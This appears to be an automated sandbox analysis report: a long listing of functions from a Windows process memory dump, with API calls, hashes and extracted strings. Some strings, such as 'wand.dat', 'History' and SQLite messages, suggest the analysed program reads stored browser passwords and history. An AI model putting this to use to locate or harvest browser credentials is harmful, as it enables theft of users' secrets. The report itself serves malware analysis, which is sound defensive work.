                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 8129eb809cb666599babc2fdefdd7344b92293add614f2139e14faf7f1e5b1bc
                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                • Opcode Fuzzy Hash: 8129eb809cb666599babc2fdefdd7344b92293add614f2139e14faf7f1e5b1bc
                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                • malloc.MSVCRT ref: 004174BD
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                • String ID:
                                • API String ID: 2903831945-0
                                • Opcode ID: 57d3071dd2de7bbc8e1c08973dbf7d9290014f20ee3246d914a41c796bcca670
                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                • Opcode Fuzzy Hash: 57d3071dd2de7bbc8e1c08973dbf7d9290014f20ee3246d914a41c796bcca670
                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetParent.USER32(?), ref: 0040D453
                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Window$Rect$ClientParentPoints
                                • String ID:
                                • API String ID: 4247780290-0
                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                • memset.MSVCRT ref: 004450CD
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                • String ID:
                                • API String ID: 1471605966-0
                                • Opcode ID: ca7eb0cd5b8fbbdf152ee798ff9388e5abd8a9aa9fa9ab44d67de31ac5094677
                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                • Opcode Fuzzy Hash: ca7eb0cd5b8fbbdf152ee798ff9388e5abd8a9aa9fa9ab44d67de31ac5094677
                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • wcscpy.MSVCRT ref: 0044475F
                                • wcscat.MSVCRT ref: 0044476E
                                • wcscat.MSVCRT ref: 0044477F
                                • wcscat.MSVCRT ref: 0044478E
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                • String ID: \StringFileInfo\
                                • API String ID: 102104167-2245444037
                                • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpy$??3@
                                • String ID: g4@
                                • API String ID: 3314356048-2133833424
                                • Opcode ID: df896e81b30d52cbef9a852e08d92ce3e452075eb819ffe599cff81d050e1bbe
                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                • Opcode Fuzzy Hash: df896e81b30d52cbef9a852e08d92ce3e452075eb819ffe599cff81d050e1bbe
                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemMetrics.USER32(00000000), ref: 00401990
                                • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: MetricsSystem$PlacementWindow
                                • String ID: AE
                                • API String ID: 3548547718-685266089
                                • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _memicmpwcslen
                                • String ID: @@@@$History
                                • API String ID: 1872909662-685208920
                                • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 004100FB
                                • memset.MSVCRT ref: 00410112
                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                • _snwprintf.MSVCRT ref: 00410141
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                • String ID: </%s>
                                • API String ID: 3400436232-259020660
                                • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040E770
                                • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: MessageSendmemset
                                • String ID: AE$"
                                • API String ID: 568519121-1989281832
                                • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040D58D
                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ChildEnumTextWindowWindowsmemset
                                • String ID: caption
                                • API String ID: 1523050162-4135340389
                                • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                • String ID: MS Sans Serif
                                • API String ID: 210187428-168460110
                                • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ClassName_wcsicmpmemset
                                • String ID: edit
                                • API String ID: 2747424523-2167791130
                                • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                • String ID: SHAutoComplete$shlwapi.dll
                                • API String ID: 3150196962-1506664499
                                • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpy$memcmp
                                • String ID:
                                • API String ID: 3384217055-0
                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$memcpy
                                • String ID:
                                • API String ID: 368790112-0
                                • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                • GetMenu.USER32(?), ref: 00410F8D
                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                • String ID:
                                • API String ID: 1889144086-0
                                • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                • GetLastError.KERNEL32 ref: 0041810A
                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                • String ID:
                                • API String ID: 1661045500-0
                                • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                • memcpy.MSVCRT ref: 0042EC7A
                                Strings
                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                • virtual tables may not be altered, xrefs: 0042EBD2
                                • Cannot add a column to a view, xrefs: 0042EBE8
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpymemset
                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                • API String ID: 1297977491-2063813899
                                • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040560C
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                • String ID: *.*$dat$wand.dat
                                • API String ID: 2618321458-1828844352
                                • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                • wcslen.MSVCRT ref: 00410C74
                                • _wtoi.MSVCRT ref: 00410C80
                                • _wcsicmp.MSVCRT ref: 00410CCE
                                • _wcsicmp.MSVCRT ref: 00410CDF
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                • String ID:
                                • API String ID: 1549203181-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00412057
                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                • GetKeyState.USER32(00000010), ref: 0041210D
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                • String ID:
                                • API String ID: 3550944819-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
